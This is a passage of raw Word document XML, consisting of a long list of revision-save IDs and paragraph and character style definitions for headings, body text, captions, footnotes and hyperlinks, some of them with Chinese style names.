    <w:rsid w:val="78850C49"/>
    <w:rsid w:val="788A10AB"/>
    <w:rsid w:val="78902D8F"/>
    <w:rsid w:val="789840BA"/>
    <w:rsid w:val="789860BA"/>
    <w:rsid w:val="78987D89"/>
    <w:rsid w:val="789D6C9A"/>
    <w:rsid w:val="789E17D3"/>
    <w:rsid w:val="789F67AE"/>
    <w:rsid w:val="78A00D4E"/>
    <w:rsid w:val="78A36D53"/>
    <w:rsid w:val="78A873DB"/>
    <w:rsid w:val="78A973D3"/>
    <w:rsid w:val="78AC0E73"/>
    <w:rsid w:val="78AE1727"/>
    <w:rsid w:val="78AE4750"/>
    <w:rsid w:val="78B25E19"/>
    <w:rsid w:val="78B62763"/>
    <w:rsid w:val="78B77176"/>
    <w:rsid w:val="78BC504F"/>
    <w:rsid w:val="78CA7ABD"/>
    <w:rsid w:val="78CC20B3"/>
    <w:rsid w:val="78D353B5"/>
    <w:rsid w:val="78D6322C"/>
    <w:rsid w:val="78DA4CD0"/>
    <w:rsid w:val="78DB2FED"/>
    <w:rsid w:val="78DC79EC"/>
    <w:rsid w:val="78DF0279"/>
    <w:rsid w:val="78E03C75"/>
    <w:rsid w:val="78E1411A"/>
    <w:rsid w:val="78E37FA3"/>
    <w:rsid w:val="78E55941"/>
    <w:rsid w:val="78E8492A"/>
    <w:rsid w:val="78E90ABE"/>
    <w:rsid w:val="78F04C08"/>
    <w:rsid w:val="78F27C98"/>
    <w:rsid w:val="78F46178"/>
    <w:rsid w:val="78FA155A"/>
    <w:rsid w:val="78FB3439"/>
    <w:rsid w:val="79052688"/>
    <w:rsid w:val="790C01C5"/>
    <w:rsid w:val="790F0F96"/>
    <w:rsid w:val="791409C7"/>
    <w:rsid w:val="791A0388"/>
    <w:rsid w:val="791A460C"/>
    <w:rsid w:val="791D6E3B"/>
    <w:rsid w:val="79216673"/>
    <w:rsid w:val="79236C04"/>
    <w:rsid w:val="79254ED7"/>
    <w:rsid w:val="79303156"/>
    <w:rsid w:val="79332C13"/>
    <w:rsid w:val="79357726"/>
    <w:rsid w:val="793669B4"/>
    <w:rsid w:val="79377F62"/>
    <w:rsid w:val="79393EBF"/>
    <w:rsid w:val="793A6D41"/>
    <w:rsid w:val="79401A64"/>
    <w:rsid w:val="7941076A"/>
    <w:rsid w:val="79420E79"/>
    <w:rsid w:val="79482B2A"/>
    <w:rsid w:val="79514CAA"/>
    <w:rsid w:val="79520CDE"/>
    <w:rsid w:val="7952650B"/>
    <w:rsid w:val="7962492F"/>
    <w:rsid w:val="7962647C"/>
    <w:rsid w:val="79631575"/>
    <w:rsid w:val="79687584"/>
    <w:rsid w:val="796A3AB2"/>
    <w:rsid w:val="796D247C"/>
    <w:rsid w:val="796F45B0"/>
    <w:rsid w:val="796F6A77"/>
    <w:rsid w:val="797B7A38"/>
    <w:rsid w:val="798510EA"/>
    <w:rsid w:val="798C1CB2"/>
    <w:rsid w:val="7995051D"/>
    <w:rsid w:val="79957576"/>
    <w:rsid w:val="79A0298D"/>
    <w:rsid w:val="79AA36A9"/>
    <w:rsid w:val="79AD4820"/>
    <w:rsid w:val="79AF7F18"/>
    <w:rsid w:val="79B4014D"/>
    <w:rsid w:val="79B7235D"/>
    <w:rsid w:val="79B81171"/>
    <w:rsid w:val="79BA27ED"/>
    <w:rsid w:val="79BC63E0"/>
    <w:rsid w:val="79C50DC4"/>
    <w:rsid w:val="79C951E6"/>
    <w:rsid w:val="79CE47B6"/>
    <w:rsid w:val="79D76823"/>
    <w:rsid w:val="79D9074E"/>
    <w:rsid w:val="79DB180E"/>
    <w:rsid w:val="79DE13DB"/>
    <w:rsid w:val="79E007A3"/>
    <w:rsid w:val="79E329F0"/>
    <w:rsid w:val="79E97444"/>
    <w:rsid w:val="79F24782"/>
    <w:rsid w:val="7A0606BF"/>
    <w:rsid w:val="7A062163"/>
    <w:rsid w:val="7A0821F8"/>
    <w:rsid w:val="7A0D1999"/>
    <w:rsid w:val="7A1D016A"/>
    <w:rsid w:val="7A1D27B4"/>
    <w:rsid w:val="7A1E58F0"/>
    <w:rsid w:val="7A283013"/>
    <w:rsid w:val="7A2D0320"/>
    <w:rsid w:val="7A3C3E92"/>
    <w:rsid w:val="7A3D7711"/>
    <w:rsid w:val="7A471B2A"/>
    <w:rsid w:val="7A4A0652"/>
    <w:rsid w:val="7A551F01"/>
    <w:rsid w:val="7A5B59B4"/>
    <w:rsid w:val="7A6177CB"/>
    <w:rsid w:val="7A666FBB"/>
    <w:rsid w:val="7A6E5BF6"/>
    <w:rsid w:val="7A6F2102"/>
    <w:rsid w:val="7A7750A8"/>
    <w:rsid w:val="7A7C11AD"/>
    <w:rsid w:val="7A7F4C51"/>
    <w:rsid w:val="7A7F7087"/>
    <w:rsid w:val="7A8F2ED1"/>
    <w:rsid w:val="7A900562"/>
    <w:rsid w:val="7A966ED7"/>
    <w:rsid w:val="7A9A5402"/>
    <w:rsid w:val="7A9E22EA"/>
    <w:rsid w:val="7AA0035B"/>
    <w:rsid w:val="7AA537BD"/>
    <w:rsid w:val="7AA94BFD"/>
    <w:rsid w:val="7AAE2225"/>
    <w:rsid w:val="7AB17360"/>
    <w:rsid w:val="7AB40796"/>
    <w:rsid w:val="7AB43356"/>
    <w:rsid w:val="7AB8771F"/>
    <w:rsid w:val="7AB91EEB"/>
    <w:rsid w:val="7ABC1CD8"/>
    <w:rsid w:val="7ABD3381"/>
    <w:rsid w:val="7AC737B4"/>
    <w:rsid w:val="7AC85128"/>
    <w:rsid w:val="7AC97C2D"/>
    <w:rsid w:val="7ACD3FCA"/>
    <w:rsid w:val="7AD3720C"/>
    <w:rsid w:val="7ADE1126"/>
    <w:rsid w:val="7AE13C83"/>
    <w:rsid w:val="7AEC63E8"/>
    <w:rsid w:val="7AF03124"/>
    <w:rsid w:val="7AF1337B"/>
    <w:rsid w:val="7AF87339"/>
    <w:rsid w:val="7AFA380D"/>
    <w:rsid w:val="7AFC243B"/>
    <w:rsid w:val="7B0B4153"/>
    <w:rsid w:val="7B164464"/>
    <w:rsid w:val="7B1D05EB"/>
    <w:rsid w:val="7B1F6CB5"/>
    <w:rsid w:val="7B205E50"/>
    <w:rsid w:val="7B27453E"/>
    <w:rsid w:val="7B2860EA"/>
    <w:rsid w:val="7B2A2473"/>
    <w:rsid w:val="7B2C7B52"/>
    <w:rsid w:val="7B2E15A4"/>
    <w:rsid w:val="7B302E02"/>
    <w:rsid w:val="7B3A4DA7"/>
    <w:rsid w:val="7B4F2A22"/>
    <w:rsid w:val="7B5336CB"/>
    <w:rsid w:val="7B5C1532"/>
    <w:rsid w:val="7B5F2CC1"/>
    <w:rsid w:val="7B605A80"/>
    <w:rsid w:val="7B6745F1"/>
    <w:rsid w:val="7B6D4130"/>
    <w:rsid w:val="7B7F0009"/>
    <w:rsid w:val="7B871310"/>
    <w:rsid w:val="7B8D10DE"/>
    <w:rsid w:val="7B9C2756"/>
    <w:rsid w:val="7BA063DC"/>
    <w:rsid w:val="7BA06873"/>
    <w:rsid w:val="7BB556AB"/>
    <w:rsid w:val="7BB82D9E"/>
    <w:rsid w:val="7BBC2301"/>
    <w:rsid w:val="7BC50AAC"/>
    <w:rsid w:val="7BC76FB2"/>
    <w:rsid w:val="7BC9422F"/>
    <w:rsid w:val="7BD14D9F"/>
    <w:rsid w:val="7BD74002"/>
    <w:rsid w:val="7BE17F56"/>
    <w:rsid w:val="7BE822E7"/>
    <w:rsid w:val="7BEB016E"/>
    <w:rsid w:val="7BFA65CB"/>
    <w:rsid w:val="7C0217C8"/>
    <w:rsid w:val="7C026BD6"/>
    <w:rsid w:val="7C0C242C"/>
    <w:rsid w:val="7C0F180F"/>
    <w:rsid w:val="7C152331"/>
    <w:rsid w:val="7C1629A6"/>
    <w:rsid w:val="7C23154F"/>
    <w:rsid w:val="7C257759"/>
    <w:rsid w:val="7C2652F6"/>
    <w:rsid w:val="7C2C497A"/>
    <w:rsid w:val="7C2C4E67"/>
    <w:rsid w:val="7C351753"/>
    <w:rsid w:val="7C3617EF"/>
    <w:rsid w:val="7C3A15D8"/>
    <w:rsid w:val="7C5811CE"/>
    <w:rsid w:val="7C581519"/>
    <w:rsid w:val="7C6579A9"/>
    <w:rsid w:val="7C684577"/>
    <w:rsid w:val="7C6F3372"/>
    <w:rsid w:val="7C705E8E"/>
    <w:rsid w:val="7C727FD5"/>
    <w:rsid w:val="7C731651"/>
    <w:rsid w:val="7C73458D"/>
    <w:rsid w:val="7C7A01A0"/>
    <w:rsid w:val="7C7C5B7E"/>
    <w:rsid w:val="7C7C706E"/>
    <w:rsid w:val="7C823EA9"/>
    <w:rsid w:val="7C831FC6"/>
    <w:rsid w:val="7C8A4D6A"/>
    <w:rsid w:val="7C8B5660"/>
    <w:rsid w:val="7C921B86"/>
    <w:rsid w:val="7C940476"/>
    <w:rsid w:val="7C956B49"/>
    <w:rsid w:val="7C990E6B"/>
    <w:rsid w:val="7C9C3562"/>
    <w:rsid w:val="7C9C5A93"/>
    <w:rsid w:val="7C9C7D5F"/>
    <w:rsid w:val="7CB31300"/>
    <w:rsid w:val="7CB81C42"/>
    <w:rsid w:val="7CBE4170"/>
    <w:rsid w:val="7CC02133"/>
    <w:rsid w:val="7CC62325"/>
    <w:rsid w:val="7CCF1577"/>
    <w:rsid w:val="7CDF59BB"/>
    <w:rsid w:val="7CE46E80"/>
    <w:rsid w:val="7CE907CE"/>
    <w:rsid w:val="7CE9168B"/>
    <w:rsid w:val="7CED7DE3"/>
    <w:rsid w:val="7CEF5E9B"/>
    <w:rsid w:val="7CF23532"/>
    <w:rsid w:val="7CF34885"/>
    <w:rsid w:val="7CFE08AB"/>
    <w:rsid w:val="7D015457"/>
    <w:rsid w:val="7D034922"/>
    <w:rsid w:val="7D075332"/>
    <w:rsid w:val="7D0C6716"/>
    <w:rsid w:val="7D1114CB"/>
    <w:rsid w:val="7D144732"/>
    <w:rsid w:val="7D154255"/>
    <w:rsid w:val="7D195FBC"/>
    <w:rsid w:val="7D3B0278"/>
    <w:rsid w:val="7D3D4F10"/>
    <w:rsid w:val="7D3F5388"/>
    <w:rsid w:val="7D4138C5"/>
    <w:rsid w:val="7D416777"/>
    <w:rsid w:val="7D443FA8"/>
    <w:rsid w:val="7D4A14A3"/>
    <w:rsid w:val="7D4F000F"/>
    <w:rsid w:val="7D4F51CC"/>
    <w:rsid w:val="7D5407B3"/>
    <w:rsid w:val="7D5452DC"/>
    <w:rsid w:val="7D5911F6"/>
    <w:rsid w:val="7D5E29A5"/>
    <w:rsid w:val="7D614359"/>
    <w:rsid w:val="7D627F4E"/>
    <w:rsid w:val="7D667D5C"/>
    <w:rsid w:val="7D67374D"/>
    <w:rsid w:val="7D673B74"/>
    <w:rsid w:val="7D6E1F08"/>
    <w:rsid w:val="7D707E72"/>
    <w:rsid w:val="7D8A49A6"/>
    <w:rsid w:val="7D8C7CE6"/>
    <w:rsid w:val="7D910940"/>
    <w:rsid w:val="7D9655F4"/>
    <w:rsid w:val="7D9870B3"/>
    <w:rsid w:val="7D9C2A37"/>
    <w:rsid w:val="7D9F5B74"/>
    <w:rsid w:val="7DAA2810"/>
    <w:rsid w:val="7DAF051C"/>
    <w:rsid w:val="7DB31BC2"/>
    <w:rsid w:val="7DB7513E"/>
    <w:rsid w:val="7DB77182"/>
    <w:rsid w:val="7DB923CD"/>
    <w:rsid w:val="7DBB356B"/>
    <w:rsid w:val="7DC54C45"/>
    <w:rsid w:val="7DCB0C18"/>
    <w:rsid w:val="7DCE37BA"/>
    <w:rsid w:val="7DD1086A"/>
    <w:rsid w:val="7DD52A52"/>
    <w:rsid w:val="7DDF614E"/>
    <w:rsid w:val="7DE312F3"/>
    <w:rsid w:val="7DE415AD"/>
    <w:rsid w:val="7DE97F2C"/>
    <w:rsid w:val="7DEA6596"/>
    <w:rsid w:val="7DF340CB"/>
    <w:rsid w:val="7DF80FDF"/>
    <w:rsid w:val="7E0346CD"/>
    <w:rsid w:val="7E07078F"/>
    <w:rsid w:val="7E090BDA"/>
    <w:rsid w:val="7E0E4175"/>
    <w:rsid w:val="7E0F518A"/>
    <w:rsid w:val="7E1134A1"/>
    <w:rsid w:val="7E155A6D"/>
    <w:rsid w:val="7E157859"/>
    <w:rsid w:val="7E18346E"/>
    <w:rsid w:val="7E1C5C94"/>
    <w:rsid w:val="7E20434D"/>
    <w:rsid w:val="7E275520"/>
    <w:rsid w:val="7E294BC1"/>
    <w:rsid w:val="7E2D75DA"/>
    <w:rsid w:val="7E377312"/>
    <w:rsid w:val="7E383E1D"/>
    <w:rsid w:val="7E39410E"/>
    <w:rsid w:val="7E3A0755"/>
    <w:rsid w:val="7E3E3A4E"/>
    <w:rsid w:val="7E427F82"/>
    <w:rsid w:val="7E4376BE"/>
    <w:rsid w:val="7E452BB8"/>
    <w:rsid w:val="7E463322"/>
    <w:rsid w:val="7E471800"/>
    <w:rsid w:val="7E4C7BB1"/>
    <w:rsid w:val="7E556E5E"/>
    <w:rsid w:val="7E5B68C9"/>
    <w:rsid w:val="7E5D5C38"/>
    <w:rsid w:val="7E634149"/>
    <w:rsid w:val="7E6403E1"/>
    <w:rsid w:val="7E6D1986"/>
    <w:rsid w:val="7E6D437B"/>
    <w:rsid w:val="7E735F36"/>
    <w:rsid w:val="7E791650"/>
    <w:rsid w:val="7E815FCB"/>
    <w:rsid w:val="7E890F19"/>
    <w:rsid w:val="7E8F0C2F"/>
    <w:rsid w:val="7EA745D6"/>
    <w:rsid w:val="7EA854D8"/>
    <w:rsid w:val="7EAC6077"/>
    <w:rsid w:val="7EB34B13"/>
    <w:rsid w:val="7EB45CCC"/>
    <w:rsid w:val="7EB740AC"/>
    <w:rsid w:val="7EB84B3A"/>
    <w:rsid w:val="7EBD5F96"/>
    <w:rsid w:val="7EC16C8D"/>
    <w:rsid w:val="7EC33255"/>
    <w:rsid w:val="7EC46744"/>
    <w:rsid w:val="7EC8173E"/>
    <w:rsid w:val="7ECB3007"/>
    <w:rsid w:val="7ECE0AD4"/>
    <w:rsid w:val="7ED279FE"/>
    <w:rsid w:val="7EDA2217"/>
    <w:rsid w:val="7EDF0482"/>
    <w:rsid w:val="7EDF0CE8"/>
    <w:rsid w:val="7EDF38E8"/>
    <w:rsid w:val="7EE60EE6"/>
    <w:rsid w:val="7EE668E9"/>
    <w:rsid w:val="7EE720DF"/>
    <w:rsid w:val="7EEA0E86"/>
    <w:rsid w:val="7EF418CB"/>
    <w:rsid w:val="7EF52B6F"/>
    <w:rsid w:val="7EF90D7A"/>
    <w:rsid w:val="7F036B1E"/>
    <w:rsid w:val="7F0C2BE4"/>
    <w:rsid w:val="7F1109BB"/>
    <w:rsid w:val="7F110F3C"/>
    <w:rsid w:val="7F111C10"/>
    <w:rsid w:val="7F1327FE"/>
    <w:rsid w:val="7F197422"/>
    <w:rsid w:val="7F1974F1"/>
    <w:rsid w:val="7F1E3B85"/>
    <w:rsid w:val="7F1F21F4"/>
    <w:rsid w:val="7F250D35"/>
    <w:rsid w:val="7F262D94"/>
    <w:rsid w:val="7F284527"/>
    <w:rsid w:val="7F2B5745"/>
    <w:rsid w:val="7F317345"/>
    <w:rsid w:val="7F38671B"/>
    <w:rsid w:val="7F3A178B"/>
    <w:rsid w:val="7F3F336B"/>
    <w:rsid w:val="7F4A0027"/>
    <w:rsid w:val="7F52186C"/>
    <w:rsid w:val="7F573B5C"/>
    <w:rsid w:val="7F583CD2"/>
    <w:rsid w:val="7F5A53F2"/>
    <w:rsid w:val="7F5A5E16"/>
    <w:rsid w:val="7F5E26D7"/>
    <w:rsid w:val="7F5F365A"/>
    <w:rsid w:val="7F6A0CE0"/>
    <w:rsid w:val="7F707066"/>
    <w:rsid w:val="7F7530DD"/>
    <w:rsid w:val="7F7B1D88"/>
    <w:rsid w:val="7F7F420D"/>
    <w:rsid w:val="7F8C796B"/>
    <w:rsid w:val="7F9875AC"/>
    <w:rsid w:val="7F9D29AB"/>
    <w:rsid w:val="7FA24CCF"/>
    <w:rsid w:val="7FA34CD5"/>
    <w:rsid w:val="7FAB7AC7"/>
    <w:rsid w:val="7FB23FBB"/>
    <w:rsid w:val="7FC4505A"/>
    <w:rsid w:val="7FC552D2"/>
    <w:rsid w:val="7FC708BD"/>
    <w:rsid w:val="7FD33449"/>
    <w:rsid w:val="7FDD7395"/>
    <w:rsid w:val="7FE309F4"/>
    <w:rsid w:val="7FE35F3F"/>
    <w:rsid w:val="7FE361F8"/>
    <w:rsid w:val="7FED547B"/>
    <w:rsid w:val="7FEE6342"/>
    <w:rsid w:val="7FF3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semiHidden="0" w:name="heading 4"/>
    <w:lsdException w:qFormat="1" w:uiPriority="0" w:semiHidden="0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qFormat="1" w:unhideWhenUsed="0" w:uiPriority="39" w:semiHidden="0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qFormat="1"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qFormat="1" w:uiPriority="99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89"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs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5"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:hAnsi="Cambria" w:eastAsia="宋体"/>
      <w:kern w:val="0"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="4">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="128"/>
    <w:autoRedefine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9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7"/>
    <w:autoRedefine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autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="9"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paragraph" w:styleId="8">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:keepNext/>
      <w:keepLines/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36">
    <w:name w:val="Default Paragraph Font"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="1"/>
  </w:style>
  <w:style w:type="table" w:default="1" w:styleId="3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Number"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="1"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="10">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:ind w:firstLine="420"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="11">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="47"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="12">
    <w:name w:val="caption"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="56"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="13">
    <w:name w:val="List Bullet"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:numPr>
        <w:ilvl w:val="0"/>
        <w:numId w:val="2"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="14">
    <w:name w:val="Document Map"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="73"/>
    <w:autoRedefine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toa heading"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:snapToGrid w:val="0"/>
      <w:spacing w:before="120" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="仿宋"/>
      <w:snapToGrid w:val="0"/>
      <w:color w:val="000000"/>
      <w:kern w:val="0"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="16">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:jc w:val="left"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="17">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:ind w:firstLine="424" w:firstLineChars="202"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="18">
    <w:name w:val="Block Text"/>
    <w:basedOn w:val="11"/>
    <w:next w:val="11"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="9"/>
    <w:pPr>
      <w:spacing w:before="100" w:after="100"/>
      <w:ind w:left="480" w:right="480" w:firstLine="0"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="19">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="800"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="20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</w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="21">
    <w:name w:val="Plain Text"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:hAnsi="Courier New" w:cs="Courier New" w:asciiTheme="minorEastAsia"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="22">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="61"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="23">
    <w:name w:val="footer"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="5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24">
    <w:name w:val="header"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="5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  <w:tab w:val="right" w:pos="9020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25">
    <w:name w:val="toc 1"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="39"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="26">
    <w:name w:val="Subtitle"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:autoRedefine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27">
    <w:name w:val="footnote text"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="28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</w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="29">
    <w:name w:val="HTML Preformatted"/>
    <w:basedOn w:val="1"/>
    <w:link w:val="69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30">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="31"/>
    <w:autoRedefine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customStyle="1" w:styleId="31">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="1"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:widowControl/>
      <w:spacing w:beforeAutospacing="1" w:afterAutospacing="1"/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32">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="253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3">
    <w:name w:val="Body Text First Indent"/>
    <w:basedOn w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:after="0" w:line="360" w:lineRule="auto"/>
      <w:ind w:firstLine="454"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="Calibri"/>
      <w:szCs w:val="21"/>
      <w:lang w:val="zh-CN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="35">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="34"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="9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7">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="22"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="38">
    <w:name w:val="page number"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:styleId="39">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="800080"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="40">
    <w:name w:val="Emphasis"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="20"/>
    <w:rPr>
      <w:i/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="41">
    <w:name w:val="HTML Typewriter"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New"/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="42">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="43">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="Lucida Console" w:hAnsi="Lucida Console" w:eastAsia="宋体" w:cs="宋体"/>
      <w:color w:val="333333"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
      <w:shd w:val="clear" w:color="auto" w:fill="F8F8F8"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="44">
    <w:name w:val="footnote reference"/>
    <w:basedOn w:val="36"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:vertAlign w:val="superscript"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="45">
    <w:name w:val="Body Text Char"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="11"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="46">
    <w:name w:val="题注 字符"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="12"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="47">
    <w:name w:val="正文文本 字符"/>
    <w:basedOn w:val="36"/>
    <w:link w:val="11"/>
    <w:autoRedefine/>
    <w:semiHidden/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="48">
    <w:name w:val="正文（绿盟科技）"/>
    <w:autoRedefine/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:pPr>
      <w:spacing w:line="300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styleId="49">
    <w:name w:val="No Spacing"/>
    <w:autoRedefine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50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51">
